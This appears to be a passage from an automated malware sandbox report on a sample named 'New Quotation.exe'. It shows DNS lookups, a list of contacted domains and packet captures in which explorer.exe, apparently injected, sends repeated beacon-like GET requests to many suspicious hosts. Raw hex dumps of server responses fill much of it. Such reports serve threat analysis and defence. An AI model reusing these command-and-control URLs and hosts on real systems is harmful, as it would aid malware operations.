                                                                                                                                                                                        Jun 10, 2022 07:56:35.800406933 CEST1.1.1.1192.168.11.200x11baNo error (0)puude.online93.89.226.17A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:56:56.804173946 CEST1.1.1.1192.168.11.200xd2f5No error (0)www.rlxijvrd.com8.214.69.48A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:15.860615015 CEST1.1.1.1192.168.11.200x7959No error (0)www.lcm-brokers.comlcm-brokers.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:15.860615015 CEST1.1.1.1192.168.11.200x7959No error (0)lcm-brokers.com172.105.250.34A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:36.466881990 CEST1.1.1.1192.168.11.200x75dNo error (0)www.solaksa.netsolaksa.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:36.466881990 CEST1.1.1.1192.168.11.200x75dNo error (0)solaksa.net152.228.155.71A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:57.339893103 CEST1.1.1.1192.168.11.200x40c1No error (0)www.hanju2020.com22.301url.xyzCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:57.339893103 CEST1.1.1.1192.168.11.200x40c1No error (0)22.301url.xyz116.204.133.148A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:58:18.556988001 CEST1.1.1.1192.168.11.200x8d5bNo error (0)www.ranabroimpexp.com43.225.157.245A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:58:37.386516094 CEST1.1.1.1192.168.11.200x28ddNo error (0)www.onlinesinavsistemi.xyzonlinesinavsistemi.xyzCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:58:37.386516094 CEST1.1.1.1192.168.11.200x28ddNo error (0)onlinesinavsistemi.xyz176.53.69.151A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:59:02.575267076 CEST1.1.1.1192.168.11.200xaac5No error (0)www.lax0.com199.59.243.220A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:59:18.944551945 CEST1.1.1.1192.168.11.200xc954No error (0)www.tuinkunst.online185.104.28.238A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:59:39.161359072 CEST1.1.1.1192.168.11.200xe539Name error (3)www.hellodamia.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                        • drive.google.com
                                                                                                                                                                                        • doc-14-as-docs.googleusercontent.com
                                                                                                                                                                                        • www.animehub.store
                                                                                                                                                                                        • www.somosnuecru.com
                                                                                                                                                                                        • www.cardviews.net
                                                                                                                                                                                        • www.belajarakuntansipajak.com
                                                                                                                                                                                        • www.cocodetteexciple.com
                                                                                                                                                                                        • www.outletgals.com
                                                                                                                                                                                        • www.bkbc.site
                                                                                                                                                                                        • www.soussecloud.com
                                                                                                                                                                                        • www.puude.online
                                                                                                                                                                                        • www.rlxijvrd.com
                                                                                                                                                                                        • www.lcm-brokers.com
                                                                                                                                                                                        • www.solaksa.net
                                                                                                                                                                                        • www.hanju2020.com
                                                                                                                                                                                        • www.ranabroimpexp.com
                                                                                                                                                                                        • www.onlinesinavsistemi.xyz
                                                                                                                                                                                        • www.lax0.com
                                                                                                                                                                                        • www.tuinkunst.online

                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        0192.168.11.2049764142.250.186.110443C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        1192.168.11.2049765172.217.19.65443C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        10192.168.11.204978593.89.226.1780C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:56:35.844875097 CEST8651OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:36.111924887 CEST8652OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:36.424364090 CEST8652OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:37.033499002 CEST8652OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:38.236413956 CEST8652OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:39.439207077 CEST8652OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:40.642115116 CEST8653OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:43.047777891 CEST8653OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:47.859307051 CEST8653OUTGET /a2c8/?Djf=KmhaFwyO9YXmIZfAkI4p4NcJhiUmQxT+J+tlcB0W70Ma7njVcl4dqyf6cQ9Vr84P1NAl&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.puude.online
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        11192.168.11.20497868.214.69.4880C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:56:57.136374950 CEST8654OUTGET /a2c8/?6lbL=qTfTz0&Djf=cnYzLO/iOmLQ80nbybEBKd6xv0BZ3jX95SMYu5eAQoFQzMXmCHJOFJgiGACm/n2x6SPU HTTP/1.1
                                                                                                                                                                                        Host: www.rlxijvrd.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:56:57.468892097 CEST8654INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:56:57 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 1.0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        12192.168.11.2049787172.105.250.3480C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:57:15.871020079 CEST8655OUTGET /a2c8/?Djf=ZOJEaTbg68I2C/h4CsFFsOVO6bUFraiXKSxh6HANJbUJoISOJ9GPYTEDhfBXlhmSduAT&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.lcm-brokers.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224081039 CEST8656INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        x-powered-by: PHP/7.4.29
                                                                                                                                                                                        content-type: text/html; charset=UTF-8
                                                                                                                                                                                        transfer-encoding: chunked
                                                                                                                                                                                        date: Fri, 10 Jun 2022 05:57:15 GMT
                                                                                                                                                                                        server: LiteSpeed
                                                                                                                                                                                        Data Raw: 32 33 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 0a 09 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e0 b9 84 e0 b8 a1 e0 b9 88 e0 b8 9e e0 b8 9a e0 b8 ab e0 b8 99 e0 b9 89 e0 b8 b2 20 26 23 38 32 31 31 3b 20 49 43 4d 2d 42 72 6f 6b 65 72 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 49 43 4d 2d 42 72 6f 6b 65 72 73 20 26 72 61 71 75 6f 3b 20 e0 b8 9f e0 b8 b5 e0 b8 94 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 63 6d 2d 62 72 6f 6b 65 72 73 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 49 43 4d 2d 42 72 6f 6b 65 72 73 20 26 72 61 71 75 6f 3b 20 e0 b8 9f e0 b8 b5 e0 b8 94 e0 b8 84 e0 b8 a7 e0 b8 b2 e0 b8 a1 e0 b9 80 e0 b8 ab e0 b9 87 e0 b8 99 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 63 6d 2d 62 72 6f 6b 65 72 73 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 31 2e 32 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 31 2e 32 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 6c 63 6d 2d 62 72 6f 6b 65 72 73 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 31 33 22 7d 7d 3b 0a 09 09 09 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 69 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 61 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 3b 70 2e 63
                                                                                                                                                                                        Data Ascii: 23b2<!DOCTYPE html><html lang="th"prefix="og: http://ogp.me/ns#" ><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="http://gmpg.org/xfn/11"> <title> &#8211; ICM-Brokers</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="ICM-Brokers &raquo; " href="http://lcm-brokers.com/feed/" /><link rel="alternate" type="application/rss+xml" title="ICM-Brokers &raquo; " href="http://lcm-brokers.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/lcm-brokers.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.13"}};!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.c
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224148035 CEST8658INData Raw: 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 69 2e 77 69 64 74 68 2c 69 2e 68 65 69 67 68 74 29 2c 70 2e 66 69 6c 6c 54 65 78 74 28 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 2c 30 2c 30 29 3b 65 3d 69 2e 74 6f 44 61 74 61 55 52 4c 28 29 3b 72 65 74
                                                                                                                                                                                        Data Ascii: learRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="tex
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224195957 CEST8659INData Raw: 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                        Data Ascii: d",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,documen
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224241972 CEST8660INData Raw: 30 69 25 32 43 36 30 30 25 32 43 36 30 30 69 25 32 43 37 30 30 25 32 43 37 30 30 69 25 32 43 38 30 30 25 32 43 38 30 30 69 25 32 43 39 30 30 25 32 43 39 30 30 69 26 23 30 33 38 3b 76 65 72 3d 35 2e 31 2e 31 33 27 20 74 79 70 65 3d 27 74 65 78 74
                                                                                                                                                                                        Data Ascii: 0i%2C600%2C600i%2C700%2C700i%2C800%2C800i%2C900%2C900i&#038;ver=5.1.13' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap-css' href='http://lcm-brokers.com/wp-content/themes/advance-portfolio/css/bootstrap.css?ver=5.1.13' ty
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224287033 CEST8662INData Raw: 72 74 66 6f 6c 69 6f 2f 6a 73 2f 53 6d 6f 6f 74 68 53 63 72 6f 6c 6c 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 31 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72
                                                                                                                                                                                        Data Ascii: rtfolio/js/SmoothScroll.js?ver=5.1.13'></script><script type='text/javascript' src='http://lcm-brokers.com/wp-content/themes/advance-portfolio/js/custom.js?ver=5.1.13'></script><script type='text/javascript' src='http://lcm-brokers.com/wp-co
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224334002 CEST8663INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 75 6c 20 69 64 3d 22 6d 65 6e 75 2d 6d 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 37 22 20 63
                                                                                                                                                                                        Data Ascii: <div class="menu-m-container"><ul id="menu-m" class="menu"><li id="menu-item-37" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-37"><a href="http://lcm-brokers.com"></a></li><li id
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224380016 CEST8664INData Raw: 20 20 20 20 20 20 20 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 63 6d 2d 62 72 6f 6b 65 72 73 2e 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 22 3e 42 61 63 6b 20 74 6f 20 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0d 0a 20 20
                                                                                                                                                                                        Data Ascii: <a href="http://lcm-brokers.com" class="button">Back to Home Page</a> </div><div class="clearfix"></div> </div></div></div> <div id="footer" class="copyright-wrapper"> <div class="container">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        13192.168.11.2049789152.228.155.7180C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:57:36.488993883 CEST8672OUTGET /a2c8/?6lbL=qTfTz0&Djf=MpN0czAuQ6QXUx2sg2pWHBUGWBvsIkeMjItV5tnwLHMMLUdJVGF+gg01BF91m3Q+VFle HTTP/1.1
                                                                                                                                                                                        Host: www.solaksa.net
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:57:36.509927988 CEST8673INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:57:36 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Location: https://solaksa.net/a2c8/?6lbL=qTfTz0&Djf=MpN0czAuQ6QXUx2sg2pWHBUGWBvsIkeMjItV5tnwLHMMLUdJVGF+gg01BF91m3Q+VFle
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000;
                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        14192.168.11.2049790116.204.133.14880C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:57:57.610743999 CEST8673OUTGET /a2c8/?Djf=WTCZorkujDQqRjcxlgclBW8LL1l4Q4yZC6MlAjn7yJTWeUkxqEHcvOf8DmefZeR6VxbM&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.hanju2020.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:57:57.885705948 CEST8675INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.15.11
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:57:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.3.4
                                                                                                                                                                                        Data Raw: 38 33 32 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a c2 a0 c2 a0 c2 a0 c2 a0 67 6f 77 65 63 68 61 74 28 29 3b 0a c2 a0 c2 a0 c2 a0 c2 a0 66 75 6e 63 74 69 6f 6e 20 67 6f 77 65 63 68 61 74 28 29 20 7b 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 76 61 72 20 69 73 57 65 69 78 69 6e 20 3d 20 75 61 2e 69 6e 64 65 78 4f 66 28 27 4d 69 63 72 6f 4d 65 73 73 65 6e 67 65 72 27 29 20 3e 20 2d 31 3b 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 2f 2f 20 e6 98 af e5 be ae e4 bf a1 e6 b5 8f e8 a7 88 e5 99 a8 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 69 66 20 28 69 73 57 65 69 78 69 6e 29 20 7b 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 77 78 2e 68 74 6d 6c 27 3b 20 2f 2f 20 e5 be ae e4 bf a1 e8 b7 b3 e8 bd ac 0a c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 c2 a0 7d 0a c2 a0 c2 a0 c2 a0 c2 a0 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 30 2e 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 32 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e8 a7 86 e9 a2 91 e7 bd 91 e7 9b 98 20 2d 20 e8 b6 85 e5 85 89 e9 80 9f 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 3e 3c 68 34 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 23 46 46 30 30 30 30 22 3e e8 a7 86 e9 a2 91 e7 bd 91 e7 9b 98 20 2d 20 e8 b6 85 e5 85 89 e9 80 9f ef bc 9a 3c 2f 66 6f 6e 74 3e 3c 2f 68 34 3e 3c 2f 70 3e 0a 09 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 65 74 61 6c 69 67 68 74 73 70 65 65 64 2e 63 6f 6d 2f 22 3e 3c 68 34 3e 77 77 77 2e 6d 65 74 61 6c 69 67 68 74 73 70 65 65 64 2e 63 6f 6d 3c 2f 68 34 3e 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 3e 3c 68 34 3e e7 bd 91 e7 9b 98 e9 9c 80 e8 a6 81 e5 af 86 e7 a0 81 e6 89 93 e5 bc 80 3c 2f 68 34 3e 3c 2f 70 3e 0a 3c 2f 70 3e 3c 68 34 3e e4 b8 80 e5 88 86 e9 92 9f e5 81 9a e5 ae 8c e4 bb bb e5 8a a1 e8 8e b7 e5 be 97 e7 bd 91 e7 9b 98 e5 af 86 e7 a0 81 ef bc 8c e7 95 85 e7 9c 8b e8 a7 86 e9 a2 91 ef bc 81 3c 2f 68 34 3e 3c 2f 70 3e 0a 3c 70 3e 3c 